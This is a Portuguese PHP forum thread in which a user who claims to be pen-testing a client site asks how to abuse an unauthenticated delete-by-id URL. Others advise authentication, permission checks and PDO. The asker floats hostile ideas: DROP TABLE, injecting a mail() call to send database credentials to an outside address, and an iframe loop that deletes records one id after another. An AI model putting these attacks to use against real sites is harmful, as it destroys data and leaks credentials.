Apagar todos os registros?

[Micilini Roll 49]

Olá pessoal estou fazendo um teste de segurança em PHP e me deparei com isso:

 

 

apagar.php?id=6549

 

ou seja,se eu colocar outro numero ali ele apaga outra coisa,e assim vai indo!

 

Quais outros metodos que o atacante pode fazer com esse id?

[Bru_ce 53]

Manda via hidden,

 

HTML

<input type="hidden" value="<?php echo $id; ?>">

 

PHP

<?php $id = $_POST['id']; ?>

[Micilini Roll 49]

Tem como entrar no banco de dados desse metodo? pois acho que ele esta fazendo deletes atraves disso!

[cristianoolv 93]

coloca um nivel de segurança nessa pagina apagar.php....

[Micilini Roll 49]

entendi cristianoolv so que eu quero mostrar para o cliente o que se pode fazer!: acredito que ele esteva fazendo da seguinte forma:

 

 

 

$id = $_get['id'];

$deletar = $pdo ou mysql_query (DELETE campo where id = $id);

 

o que posso saber atraves disso que parametros a mais eu posso colocar na variavel id!?

[shini 318]

coloca no lugar de algum numero >1

 

 

$id = '>1';
DELETE campo where id = $id)

[hinom 5]

hein ??

 

geralmente tem que ter autenticação, não ?

 

se não estiver logado, não executa...

[gremio10 14]

Faz o seguinte, pegue primeiro o id para o delete, verifique se ele existe, depois veja se o usuário possui permissão para fazer tal ação, ai sim, tu faz o delete.

[Micilini Roll 49]

Possue sim! tava pensando em fazer um drop table ou talvez tentar de alguma forma enviar a senha e o login do banco de dados via email exemplo:

 

 

Todos/quase todos usam $localhost = "localhost"; $login = "ass"; $dbname= "asas";

 

e no $id colocar:

 

 

$id= "mail("imaster@hot.com","serial",$localhost.$login.$dbname)"

 

algo do tipo! sera que funciona?!

tem esse tambem olha:

 

 

mural_amigo.php?id=gabriel-santana

 

ele pega o id novamente e mostra os resultados atraves de um select o que eu posso fazer ai tambem??

Warning: mysql_query() [function.mysql-query]: Access denied for user 'wander@'localhost' (using password: NO) in /home/linew568/public_html/mural_amigo.php on line 45

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/wander/public_html/mural_amigo.php on line 45

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/wander/public_html/mural_amigo.php on line 46

OBS: nao tenho acesso ao site! estou somente testando as taticas ofensivas como um usuario vindo da internet! ou seja nao tenho acesso nen a senha do banco de dados do cliente!

[Marcos Xavier 189]

Man você quer saber sobre o delete ou select?Confudiu!!

[Micilini Roll 49]

Tanto faz! desde que eu descubra uma folha de segurança que possa comprometer o banco de dados ! :yes:

[gremio10 14]

Pelo que estou percebendo, tu está com "medo" da questão de SQLInjection, o ideal seria utilizar o PDO, ai tu teria mais tranquilidade, depois é aquela, verifica se o id existe, se o id pertence ao usuário que está fazendo a ação, se o usuário tem permissão para tal ação e assim por diante.

[Micilini Roll 49]

tu está com "medo" da questão de SQLInjection

 

wrong! eu estou tentando invadir o sistema do cliente atraves desse metodo!! e mostrar pra ele as possiveis falhas! tudo bem que no caso do id eu coloque se o id existe ! so que nessa ocasião eu quero me aprofundar ou seja! descobrir alem de poder deletar todos os id's que eu quiser o que mais eu posso fazer ali?

 

1. Drop all tables
2. drop where
3. mail?

 

Mais quais??

[Micilini Roll 49]

Nao aconteceu nada! eu coloco acentos, / !`` e parece que nao da em nada ja tentei inserir um >1 como shini falou mas nao aconteçe nada!

 

Mas percebi que da pra fazer o seguinte:

 

Criar um projeto aonde tem um iframe e a cada 1,5 segundos mandar o javascript atualizar o src do iframe fazend uma contagem do menor para o maior nun intervalo de 1,5 segundos! desta forma:

 

 

1. lxxxxcom/apagar.php?id=1
2. lxxxxcom/apagar.php?id=2
3. lxxxxcom/apagar.php?id=3
4. lxxxxcom/apagar.php?id=4
5. lxxxxcom/apagar.php?id=....

 

Outras formas?

[Fabio Pratta 14]

Se existe esta brecha vc consegue fazer ate SELECTS ai procura no GOOGLE SQLInjection fica complicado sair explicando como invadir sistemas alheios!

 

Abs!

[hinom 5]

tu é muito confuso bicho..

 

está competindo com o zoação ?

[Enrico Pereira 299]

Talvez seja mais fácil usar uma ferramenta para isso: http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/

 

E nem sempre haverá falhas de SQL Injection em um sistema.

[Micilini Roll 49]

Entendi pessoal! backtrack tambem facilita muito na hora de um penteste ! resolvido!!!